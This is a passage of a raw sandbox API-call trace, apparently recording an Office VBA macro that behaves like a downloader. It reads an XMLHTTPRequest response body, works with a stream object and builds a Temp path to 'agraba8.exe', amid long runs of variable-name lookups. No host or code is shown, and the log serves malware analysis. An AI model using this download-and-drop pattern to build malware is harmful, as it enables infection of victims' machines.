0x23 [0045.521] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="summer", lHashVal=0x10da04, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.521] IUnknown:Release (This=0x782a220) returned 0x22 [0045.521] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.521] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="summer", lHashVal=0x10da04, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.521] IUnknown:Release (This=0x731da90) returned 0x15 [0045.521] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.521] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="summer", lHashVal=0x10da04, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.521] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.522] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.522] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="summer", lHashVal=0x10da04, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.522] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.522] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb494df0 [0045.522] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_summer") returned 0x10546e [0045.522] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xe, _Src="_B_var_summer" | out: _Dst="_B_var_summer") returned 0x0 [0045.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=14, lpWideCharStr=0x2e4540, cchWideChar=14 | out: lpWideCharStr="_B_var_summer") returned 14 [0045.522] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.522] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_summer", lHashVal=0x10546e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.522] IUnknown:Release (This=0x782a220) returned 0x22 [0045.522] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.522] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_summer", lHashVal=0x10546e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.522] IUnknown:Release (This=0x731da90) returned 0x15 [0045.522] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.522] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_summer", lHashVal=0x10546e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.522] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.522] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.522] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_summer", lHashVal=0x10546e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.522] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.522] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.522] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_summer", lHashVal=0x10546e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.522] IUnknown:Release (This=0x782b300) returned 0x6 [0045.522] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.522] IUnknown:Release (This=0x782a220) returned 0x22 [0045.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52e8ea, cbMultiByte=1, lpWideCharStr=0x9db1e64, cchWideChar=4 | out: lpWideCharStr=".") returned 1 [0045.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52e8f6, cbMultiByte=1, lpWideCharStr=0x9db207c, cchWideChar=4 | out: lpWideCharStr=".") returned 1 [0045.522] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="winter") returned 0x103211 [0045.522] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x7, _Src="winter" | out: _Dst="winter") returned 0x0 [0045.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=7, lpWideCharStr=0x2e4390, cchWideChar=7 | out: lpWideCharStr="winter") returned 7 [0045.522] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.522] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="winter", lHashVal=0x103211, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.522] IUnknown:Release (This=0x782a220) returned 0x22 [0045.522] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.522] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="winter", lHashVal=0x103211, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.522] IUnknown:Release (This=0x731da90) returned 0x15 [0045.523] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.523] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="winter", lHashVal=0x103211, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.523] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.523] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.523] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="winter", lHashVal=0x103211, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.523] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.523] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb494df0 [0045.523] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_winter") returned 0x10acba [0045.523] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xe, _Src="_B_var_winter" | out: _Dst="_B_var_winter") returned 0x0 [0045.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=14, lpWideCharStr=0x2e4540, cchWideChar=14 | out: lpWideCharStr="_B_var_winter") returned 14 [0045.523] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.523] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_winter", lHashVal=0x10acba, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.523] IUnknown:Release (This=0x782a220) returned 0x22 [0045.523] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.523] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_winter", lHashVal=0x10acba, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.523] IUnknown:Release (This=0x731da90) returned 0x15 [0045.523] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.523] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_winter", lHashVal=0x10acba, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.523] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.523] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.523] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_winter", lHashVal=0x10acba, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.523] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.523] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.523] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_winter", lHashVal=0x10acba, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.523] IUnknown:Release (This=0x782b300) returned 0x6 [0045.523] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.523] IUnknown:Release (This=0x782a220) returned 0x22 [0045.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821bfe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="Type") returned 0 [0045.523] wcscpy_s (in: _Destination=0xb64bf28, _SizeInWords=0x5, _Source="Type" | out: _Destination="Type") returned 0x0 [0045.524] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5df0) [0045.526] VarBstrFromI2 (iVal=8, lcid=0x409, dwFlags=0x0, pbstrOut=0x2e5f08*="ɧ\x0c") returned 0x0 [0045.526] VarBstrCat (in: bstrLeft="8", bstrRight=".", pbstrResult=0x2e5f10 | out: pbstrResult=0x2e5f10) returned 0x0 [0045.526] VarBstrCat (in: bstrLeft="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", bstrRight="\\agraba8.exe", pbstrResult=0x2e5f10 | out: pbstrResult=0x2e5f10) returned 0x0 [0045.526] VarSub (in: pvarLeft=0xb404570, pvarRight=0xb4045a0, pvarResult=0xb404a88 | out: pvarResult=0xb404a88) returned 0x0 [0045.526] IDispatch:GetIDsOfNames (in: This=0xdfc1400, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e5f00*="Type", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x2e5ee4 | out: rgDispId=0x2e5ee4*=4) returned 0x0 [0045.542] IDispatch:Invoke (in: This=0xdfc1400, dispIdMember=4, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x2e5e38*(rgvarg=([0]=0xb404558*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0)), rgdispidNamedArgs=([0]=0x2e5ee4*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x2e5e50, puArgErr=0x2e5e30 | out: pDispParams=0x2e5e38*(rgvarg=([0]=0xb404558*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0)), rgdispidNamedArgs=([0]=0x2e5ee4*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x2e5e50*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2e5e30*=0x2e5fa0) returned 0x0 [0045.542] SafeArrayDestroyData (psa=0xb404a38) returned 0x0 [0045.542] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0xb404ae0 | out: ppsaOut=0xb404ae0) returned 0x0 [0045.542] SafeArrayAllocData (psa=0x734d380) returned 0x0 [0045.543] VarBstrCat (in: bstrLeft="Open", bstrRight="", pbstrResult=0x2e6070 | out: pbstrResult=0x2e6070) returned 0x0 [0045.543] Stream:IUnknown:AddRef (This=0xdfc1400) returned 0x2 [0045.543] IDispatch:GetIDsOfNames (in: This=0xdfc1400, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e6030*="Open", cNames=0x1, lcid=0x50046800000409, rgDispId=0x2e5f20 | out: rgDispId=0x2e5f20*=10) returned 0x0 [0045.543] IDispatch:Invoke (in: This=0xdfc1400, dispIdMember=10, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x2e5f38*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2e5f58, pExcepInfo=0x2e5fc0, puArgErr=0x0 | out: pDispParams=0x2e5f38*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2e5f58*(varType=0x0, wReserved1=0xeabb, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x0, varVal2=0xb404ac0), pExcepInfo=0x2e5fc0*(wCode=0x0, wReserved=0x0, bstrSource="Open", bstrDescription=0x8, bstrHelpFile=0x8, dwHelpContext=0x10, pvReserved=0x7fefd65d8ff, pfnDeferredFillIn=0x2e6070, scode=0xb5c75e4), puArgErr=0x0) returned 0x0 [0045.544] SafeArrayDestroyData (psa=0x734d380) returned 0x0 [0045.544] SafeArrayDestroyDescriptor (psa=0x734d380) returned 0x0 [0045.544] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0xb404ae0 | out: ppsaOut=0xb404ae0) returned 0x0 [0045.544] SafeArrayAllocData (psa=0x734d380) returned 0x0 [0045.544] VarBstrCat (in: bstrLeft="res", bstrRight="ponseBo", pbstrResult=0x2e6070 | out: pbstrResult=0x2e6070) returned 0x0 [0045.544] VarBstrCat (in: bstrLeft="responseBo", bstrRight="dy", pbstrResult=0x2e6070 | out: pbstrResult=0x2e6070) returned 0x0 [0045.544] XMLHTTPRequest:IUnknown:AddRef (This=0xaba5aa0) returned 0x2 [0045.544] IDispatch:GetIDsOfNames (in: This=0xaba5aa0, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2e6030*="responseBody", cNames=0x1, lcid=0x50046900000409, rgDispId=0x2e5f20 | out: rgDispId=0x2e5f20*=11) returned 0x0 [0045.544] IDispatch:Invoke (in: This=0xaba5aa0, dispIdMember=11, riid=0x7fee3a6aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x2e5f38*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2e5f58, pExcepInfo=0x2e5fc0, puArgErr=0x0 | out: pDispParams=0x2e5f38*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2e5f58*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb676b70*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0xb676b90*, rgsabound=((cElements=0x97800, lLbound=0))), varVal2=0x0), pExcepInfo=0x2e5fc0*(wCode=0x0, wReserved=0x0, bstrSource="responseBo", bstrDescription=0x18, bstrHelpFile=0x14, dwHelpContext=0xb404c50, pvReserved=0x7fefd65d8ff, pfnDeferredFillIn=0x2e6070, scode=0xb64acdc), puArgErr=0x0) returned 0x0 [0045.548] SafeArrayDestroyData (psa=0x734d380) returned 0x0 [0045.548] SafeArrayDestroyDescriptor (psa=0x734d380) returned 0x0 [0045.560] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="doc_of_word_outline_level6", cchCount1=-1, lpString2="peascock", cchCount2=-1) returned 1 [0045.560] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="word_outline_level6", cchCount1=-1, lpString2="peascock", cchCount2=-1) returned 3 [0045.560] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="WriteLOG", cchCount1=-1, lpString2="peascock", cchCount2=-1) returned 3 [0045.560] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="peascock", cchCount1=-1, lpString2="peascock", cchCount2=-1) returned 2 [0045.561] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.561] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xa510000 [0045.562] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.562] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.562] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.562] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6821e0a, cbMultiByte=7, lpWideCharStr=0x2e2f20, cchWideChar=6 | out: lpWideCharStr="Write") returned 0 [0045.562] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.562] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.562] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CryToLoad") returned 0x10165c [0045.562] strcpy_s (in: _Dst=0x2e3060, _DstSize=0xa, _Src="CryToLoad" | out: _Dst="CryToLoad") returned 0x0 [0045.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=10, lpWideCharStr=0x2e2eb0, cchWideChar=10 | out: lpWideCharStr="CryToLoad") returned 10 [0045.562] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.562] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="CryToLoad", lHashVal=0x10165c, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.562] IUnknown:Release (This=0x782a220) returned 0x22 [0045.562] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.562] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="CryToLoad", lHashVal=0x10165c, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.563] IUnknown:Release (This=0x731da90) returned 0x15 [0045.563] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.563] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="CryToLoad", lHashVal=0x10165c, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.563] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.563] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.563] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="CryToLoad", lHashVal=0x10165c, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.563] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.563] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb4984b0 [0045.563] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CryToLoad") returned 0x101020 [0045.563] strcpy_s (in: _Dst=0x2e3210, _DstSize=0x11, _Src="_B_var_CryToLoad" | out: _Dst="_B_var_CryToLoad") returned 0x0 [0045.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=17, lpWideCharStr=0x2e3060, cchWideChar=17 | out: lpWideCharStr="_B_var_CryToLoad") returned 17 [0045.563] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.563] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_CryToLoad", lHashVal=0x101020, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.563] IUnknown:Release (This=0x782a220) returned 0x22 [0045.563] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.563] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_CryToLoad", lHashVal=0x101020, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.563] IUnknown:Release (This=0x731da90) returned 0x15 [0045.563] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.563] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_CryToLoad", lHashVal=0x101020, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.563] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.563] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.563] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_CryToLoad", lHashVal=0x101020, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.563] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.563] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.563] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_CryToLoad", lHashVal=0x101020, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.563] IUnknown:Release (This=0x782b300) returned 0x6 [0045.563] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.563] IUnknown:Release (This=0x782a220) returned 0x22 [0045.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a503e2, cbMultiByte=12, lpWideCharStr=0x2e2f20, cchWideChar=11 | out: lpWideCharStr="Compressed") returned 0 [0045.563] wcscpy_s (in: _Destination=0xb64bf40, _SizeInWords=0xb, _Source="Compressed" | out: _Destination="Compressed") returned 0x0 [0045.563] IUnknown:AddRef (This=0xb4db9e8) returned 0x5 [0045.563] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.563] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="G") returned 0x10105e [0045.563] strcpy_s (in: _Dst=0x2e3060, _DstSize=0x2, _Src="G" | out: _Dst="G") returned 0x0 [0045.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=2, lpWideCharStr=0x2e2eb0, cchWideChar=2 | out: lpWideCharStr="G") returned 2 [0045.563] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.564] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="G", lHashVal=0x10105e, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.564] IUnknown:Release (This=0x782a220) returned 0x22 [0045.564] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.564] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="G", lHashVal=0x10105e, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.564] IUnknown:Release (This=0x731da90) returned 0x15 [0045.564] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.564] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="G", lHashVal=0x10105e, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.564] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.564] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.564] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="G", lHashVal=0x10105e, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.564] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.564] IMalloc:Alloc (This=0x7fefe015380, cb=0x9) returned 0xb4984b0 [0045.564] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_G") returned 0x10a207 [0045.564] strcpy_s (in: _Dst=0x2e3210, _DstSize=0x9, _Src="_B_var_G" | out: _Dst="_B_var_G") returned 0x0 [0045.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3210, cbMultiByte=9, lpWideCharStr=0x2e3060, cchWideChar=9 | out: lpWideCharStr="_B_var_G") returned 9 [0045.564] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.564] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_G", lHashVal=0x10a207, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.564] IUnknown:Release (This=0x782a220) returned 0x22 [0045.564] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.564] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_G", lHashVal=0x10a207, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.564] IUnknown:Release (This=0x731da90) returned 0x15 [0045.564] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.564] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_G", lHashVal=0x10a207, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.564] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.564] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.564] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_G", lHashVal=0x10a207, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.564] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.564] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.564] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_G", lHashVal=0x10a207, pfName=0x2e3130, pBstrLibName=0x2e3060 | out: pfName=0x2e3130*=0, pBstrLibName=0x2e3060) returned 0x0 [0045.564] IUnknown:Release (This=0x782b300) returned 0x6 [0045.564] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.564] IUnknown:Release (This=0x782a220) returned 0x22 [0045.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50432, cbMultiByte=6, lpWideCharStr=0x2e2f20, cchWideChar=5 | out: lpWideCharStr="Size") returned 0 [0045.564] wcscpy_s (in: _Destination=0xb64bf60, _SizeInWords=0x5, _Source="Size" | out: _Destination="Size") returned 0x0 [0045.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb514404, cbMultiByte=2, lpWideCharStr=0xa5112cc, cchWideChar=6 | out: lpWideCharStr="&H") returned 2 [0045.565] IUnknown:Release (This=0xb4db9e8) returned 0x4 [0045.565] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LoadedROM") returned 0x10cabe [0045.565] strcpy_s (in: _Dst=0x2e3060, _DstSize=0xa, _Src="LoadedROM" | out: _Dst="LoadedROM") returned 0x0 [0045.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3060, cbMultiByte=10, lpWideCharStr=0x2e2eb0, cchWideChar=10 | out: lpWideCharStr="LoadedROM") returned 10 [0045.565] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.565] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="LoadedROM", lHashVal=0x10cabe, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.565] IUnknown:Release (This=0x782a220) returned 0x22 [0045.565] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.565] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="LoadedROM", lHashVal=0x10cabe, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.565] IUnknown:Release (This=0x731da90) returned 0x15 [0045.565] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.565] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="LoadedROM", lHashVal=0x10cabe, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, pBstrLibName=0x2e2eb0) returned 0x0 [0045.565] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.565] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.565] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="LoadedROM", lHashVal=0x10cabe, pfName=0x2e2f80, pBstrLibName=0x2e2eb0 | out: pfName=0x2e2f80*=0, 